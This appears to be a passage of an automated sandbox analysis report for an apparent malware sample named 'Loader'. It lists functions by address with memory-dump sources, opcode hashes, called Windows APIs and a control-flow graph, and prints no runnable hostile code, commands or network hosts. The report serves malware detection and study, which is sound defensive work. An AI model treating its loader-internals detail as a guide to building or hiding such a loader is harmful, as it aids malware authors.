                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 683baccd8ea49aeca77622ebd9cee491a35b602b586a224dcb7b6e790cf689e6
                                                                                        • Instruction ID: 427a9e54cac6336696faaf529140800e8bf9d5987ddbf87919c8dba67af658cf
                                                                                        • Opcode Fuzzy Hash: 683baccd8ea49aeca77622ebd9cee491a35b602b586a224dcb7b6e790cf689e6
                                                                                        • Instruction Fuzzy Hash: 50C13B72E086548FD724DB7C88553AEBBE25B8E330F19836ED8E5A73D1D6388D018785
                                                                                        Function 0043EC80 Relevance: .3, Instructions: 274COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1be28d49087dfa68073e8d39aa268690e29c9ae18c9411ebac5a15625f431aeb
                                                                                        • Instruction ID: 3592bb19b75c41b3fd134f61096da3bbee44f5b25fdbf35eb0b3c98660bcbcf4
                                                                                        • Opcode Fuzzy Hash: 1be28d49087dfa68073e8d39aa268690e29c9ae18c9411ebac5a15625f431aeb
                                                                                        • Instruction Fuzzy Hash: 25815932A053159FC720EF19C841A6BB3A2FFD9710F1A942DE8845B3A5EB34AC51C786
                                                                                        Function 0043A970 Relevance: .3, Instructions: 255COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1c92b4fed86105a2f852c97e54f380d11548d7efa8480145cf468c512cf6308a
                                                                                        • Instruction ID: 1c1b3194b7e558cfa000f4a90320cca645637f0b325fb066fb166247f68e3773
                                                                                        • Opcode Fuzzy Hash: 1c92b4fed86105a2f852c97e54f380d11548d7efa8480145cf468c512cf6308a
                                                                                        • Instruction Fuzzy Hash: 9F519D36A482108FDB18DF14D850A3BF392EB89314F1AD86ED5C2E7351D6386C21CB8B
                                                                                        Function 0043E840 Relevance: .2, Instructions: 152COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 945b97ecedb280497bdbdce8cc29cb5d54ac0797ef187a8a1d21991aa100e093
                                                                                        • Instruction ID: 4d7dcfee1db6f6d48993414e542c2c95e5bcdc0dd52ea84200f971aeb3cabb85
                                                                                        • Opcode Fuzzy Hash: 945b97ecedb280497bdbdce8cc29cb5d54ac0797ef187a8a1d21991aa100e093
                                                                                        • Instruction Fuzzy Hash: A04137766153005FE314EB26DC80B67B3A6FFC9314F1A982DE584973A0E635EC11978A
                                                                                        Function 0043CA12 Relevance: .1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3450e27d7a76b55cd00648270dc7d67fb1e8b4cd8b6210618ef28392449a0fa8
                                                                                        • Instruction ID: 9bab5eeda3f2c328a6bc7135d099a7f1260cbe33dc8c8fee6861cc27dc7a273f
                                                                                        • Opcode Fuzzy Hash: 3450e27d7a76b55cd00648270dc7d67fb1e8b4cd8b6210618ef28392449a0fa8
                                                                                        • Instruction Fuzzy Hash: 1C21E935B441198BDB04DB14C8C1ABFB332BB9E714F28B129C85237352D3399D129B98
                                                                                        Function 011CC600 Relevance: 4.7, APIs: 3, Instructions: 197COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 767 11cc600-11cc619 768 11cc62f-11cc634 767->768 769 11cc61b-11cc62b call 11cd985 767->769 771 11cc636-11cc63e 768->771 772 11cc641-11cc667 call 11c9eea 768->772 769->768 775 11cc62d 769->775 771->772 777 11cc7dd-11cc7ee call 11c40d7 772->777 778 11cc66d-11cc678 772->778 775->768 780 11cc67e-11cc683 778->780 781 11cc7d0 778->781 784 11cc69c-11cc6a7 call 11ca888 780->784 785 11cc685-11cc68e call 11cfef0 780->785 782 11cc7d2 781->782 786 11cc7d4-11cc7db call 11caa25 782->786 784->782 794 11cc6ad 784->794 785->782 792 11cc694-11cc69a 785->792 786->777 795 11cc6b3-11cc6b8 792->795 794->795 795->782 796 11cc6be-11cc6d3 call 11c9eea 795->796 796->782 799 11cc6d9-11cc6eb call 11cb0ed 796->799 801 11cc6f0-11cc6f4 799->801 801->782 802 11cc6fa-11cc702 801->802 803 11cc73c-11cc748 802->803 804 11cc704-11cc709 802->804 805 11cc74a-11cc74c 803->805 806 11cc7c5 803->806 804->786 807 11cc70f-11cc711 804->807 809 11cc74e-11cc757 call 11cfef0 805->809 810 11cc761-11cc76c call 11ca888 805->810 811 11cc7c7-11cc7ce call 11caa25 806->811 807->782 808 11cc717-11cc731 call 11cb0ed 807->808 808->786 820 11cc737 808->820 809->811 821 11cc759-11cc75f 809->821 810->811 822 11cc76e 810->822 811->782 820->782 823 11cc774-11cc779 821->823 822->823 823->811 824 11cc77b-11cc793 call 11cb0ed 823->824 824->811 827 11cc795-11cc79c 824->827 828 11cc7bd-11cc7c3 827->828 829 11cc79e-11cc79f 827->829 830 11cc7a0-11cc7b2 call 11c9fa4 828->830 829->830 830->811 833 11cc7b4-11cc7bb call 11caa25 830->833 833->786
                                                                                        APIs
                                                                                        • __freea.LIBCMT ref: 011CC7B5
                                                                                          • Part of subcall function 011CA888: HeapAlloc.KERNEL32(00000000,011C99B7,011CB787,?,011C99B7,00000220,?,?,011CB787), ref: 011CA8BA
                                                                                        • __freea.LIBCMT ref: 011CC7C8
                                                                                        • __freea.LIBCMT ref: 011CC7D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: __freea$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 85559729-0
                                                                                        • Opcode ID: eb040b4ee398c46ae6fc713839e1b14fd8b68504cb03242577cd215a053805d1
                                                                                        • Instruction ID: 5139a72cbbc7ec1f7b3eeba25898b1a9ddde84eb644bcf39b2b335181260b50f
                                                                                        • Opcode Fuzzy Hash: eb040b4ee398c46ae6fc713839e1b14fd8b68504cb03242577cd215a053805d1
                                                                                        • Instruction Fuzzy Hash: 3651A372600617AFEB299E68DC81FBB7AA9EF64E14F15012DFD08D6140EB34DC21C6A1
                                                                                        Function 011C9BB3 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 011C96EA: GetOEMCP.KERNEL32(00000000,?,?,?,011CB787), ref: 011C9715
                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,011C99FA,?,00000000,?,?,011CB787), ref: 011C9C14
                                                                                        • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,011C99FA,?,00000000,?,?,011CB787), ref: 011C9C50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: CodeInfoPageValid
                                                                                        • String ID:
                                                                                        • API String ID: 546120528-0
                                                                                        • Opcode ID: c277c37071218c0a5b063d85f32a6031261e1d59d62a5136e868c027436738fc
                                                                                        • Instruction ID: 72b4e8b1dbe62080afb29a8a25926d17f17421c157a9636887050ac71a025f09
                                                                                        • Opcode Fuzzy Hash: c277c37071218c0a5b063d85f32a6031261e1d59d62a5136e868c027436738fc
                                                                                        • Instruction Fuzzy Hash: 4E513870A003499EDB29CF39C4406FEBBF5EFA1B0CF18406EC1969B291DB799545CB50
                                                                                        Function 011CB0ED Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LCMapStringEx.KERNELBASE(?,011CC6F0,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 011CB121
                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,011CC6F0,?,?,-00000008,?,00000000), ref: 011CB13F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: String
                                                                                        • String ID:
                                                                                        • API String ID: 2568140703-0
                                                                                        • Opcode ID: 89ff164a05d8ec91a857a90de6c7580a3ae0506ad3f60a9942102410616ba727
                                                                                        • Instruction ID: d8cf0da1d476c18d7e468a513fabf759b9525ee2be021159bd1889b55d58388d
                                                                                        • Opcode Fuzzy Hash: 89ff164a05d8ec91a857a90de6c7580a3ae0506ad3f60a9942102410616ba727
                                                                                        • Instruction Fuzzy Hash: 24F07A3250515ABBCF166F90EC05DDE3F66EF687A5F054014FA1865020D736C871AB95
                                                                                        Function 0043C5AF Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0043C5AF
                                                                                        • GetForegroundWindow.USER32 ref: 0043C5C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ForegroundWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2020703349-0
                                                                                        • Opcode ID: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                        • Instruction ID: 333b4a9834557b4172d2651f462c7a903e8ce65bf7bd4680bd615953da4b5774
                                                                                        • Opcode Fuzzy Hash: 79680ac2d5f547ec917eb5f99452d1fa5a9d20136bed208c7213e3ef94e53174
                                                                                        • Instruction Fuzzy Hash: 80D05EE995150047CA04BB71AC858273229F64B34A7186878E00301262EA25A0428B5B
                                                                                        Function 011C97BE Relevance: 1.6, APIs: 1, Instructions: 142COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,011C99FA,?), ref: 011C97F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Info
                                                                                        • String ID:
                                                                                        • API String ID: 1807457897-0
                                                                                        • Opcode ID: d43989f8238828233f6e9f9aac7ca9c7187fcdfc11a8cd976d2224bdfa69373f
                                                                                        • Instruction ID: c7440048b1648510dceb1c6852c106bf279e338a9d7325fda88554955c380784
                                                                                        • Opcode Fuzzy Hash: d43989f8238828233f6e9f9aac7ca9c7187fcdfc11a8cd976d2224bdfa69373f
                                                                                        • Instruction Fuzzy Hash: 5B5127B190815DAADB198E28CC84BEABFA8FF25B08F1401EDD599C7182D3359D45CF61
                                                                                        Function 0043C2D0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                        • Instruction ID: 8a0177ad85e7c08c69245f52b8f4417eb00afcd063061f7275faf4d6d67a0887
                                                                                        • Opcode Fuzzy Hash: 98cbbb343254cd52c79eb1ca115f38d3187f6c377695bce7c7a2cd07440916c9
                                                                                        • Instruction Fuzzy Hash: AAE02B76418221ABC6002B25BC09B5B3A68DF8E721F030C36F40072121D739E81286EF
                                                                                        Function 0042F3C1 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: a18d56fad5a96f013a25ab8829a1815cfaa1a5b039c676a3c735c5b8ea5e42e4
                                                                                        • Instruction ID: 1b26c67158fdd6cda6fdecceee19ec6b2839f0717a30f5b989b10993f200af12
                                                                                        • Opcode Fuzzy Hash: a18d56fad5a96f013a25ab8829a1815cfaa1a5b039c676a3c735c5b8ea5e42e4
                                                                                        • Instruction Fuzzy Hash: C201ECB560D3819FD305CF24D46470ABBF0EF46304F05889DE5958B2A2C775A949CF56
                                                                                        Function 004322B8 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlanketProxy
                                                                                        • String ID:
                                                                                        • API String ID: 3890896728-0
                                                                                        • Opcode ID: a8bb812586e4c46681c8ad4fa8ef5685346ea06700b989548cf1ce1faff14cc7
                                                                                        • Instruction ID: 935b5868952aa2069f21c57713507472c84af2c432f668984a81a3c1c2622ac8
                                                                                        • Opcode Fuzzy Hash: a8bb812586e4c46681c8ad4fa8ef5685346ea06700b989548cf1ce1faff14cc7
                                                                                        • Instruction Fuzzy Hash: AAF0A4B55087029FE310DF65D55870BBBE1AB85318F15891CE0944B254D7B5A5498FC2
                                                                                        Function 0040C5C0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 2538663250-0
                                                                                        • Opcode ID: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                        • Instruction ID: ce014e1d32f27ec12ad37ecc0dfb2a09a1fae06e6abce3ab2790199683b38062
                                                                                        • Opcode Fuzzy Hash: 850955786ed28da5065a80bade014127d727ab8898c815214f1986fcd95a4124
                                                                                        • Instruction Fuzzy Hash: CFD02E2969000027D208AB2CAC07F23329D9B03B52F000239E1A3969E2ED406900826A
                                                                                        Function 0040C5F5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeSecurity
                                                                                        • String ID:
                                                                                        • API String ID: 640775948-0
                                                                                        • Opcode ID: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                        • Instruction ID: 64d0c7dc1a51f575c656917cfcf27d06668b7b4f648f1d88eb1df91404deb98c
                                                                                        • Opcode Fuzzy Hash: 131c3e875a066bb12a276a62a713607dd4adbce56e7278532486b94642aead36
                                                                                        • Instruction Fuzzy Hash: C7D0C9743C834176F5348B08EC13F5132555302F12F340624F362FE2E4CAD0B201860C
                                                                                        Function 0043A940 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                        • Instruction ID: c567b57adf38a1f54fef76dd5790cc9636adae08f6cfb23484a9f5fe40784e0e
                                                                                        • Opcode Fuzzy Hash: 910c0af3420ea00ce46c07591240b3ae9376ee87c5be7e09da62257baa930bc0
                                                                                        • Instruction Fuzzy Hash: 42D01272419632FBC6102F18BC15BCB3B55EF4A321F0748A2F5446A175D774DC91CAD8
                                                                                        Function 0043A92B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                        • Instruction ID: 2264aa9d2aabd2ef6d2248d85dbb31dab42ea94ade32cd6cf29d8f8327bb6f23
                                                                                        • Opcode Fuzzy Hash: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
                                                                                        • Instruction Fuzzy Hash: 18A012300401109AC5141B00BD09FC53E10DB11211F010051B000040B182508841C5C4

                                                                                        Non-executed Functions

                                                                                        Function 00411C40 Relevance: 133.2, Strings: 105, Instructions: 1974COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
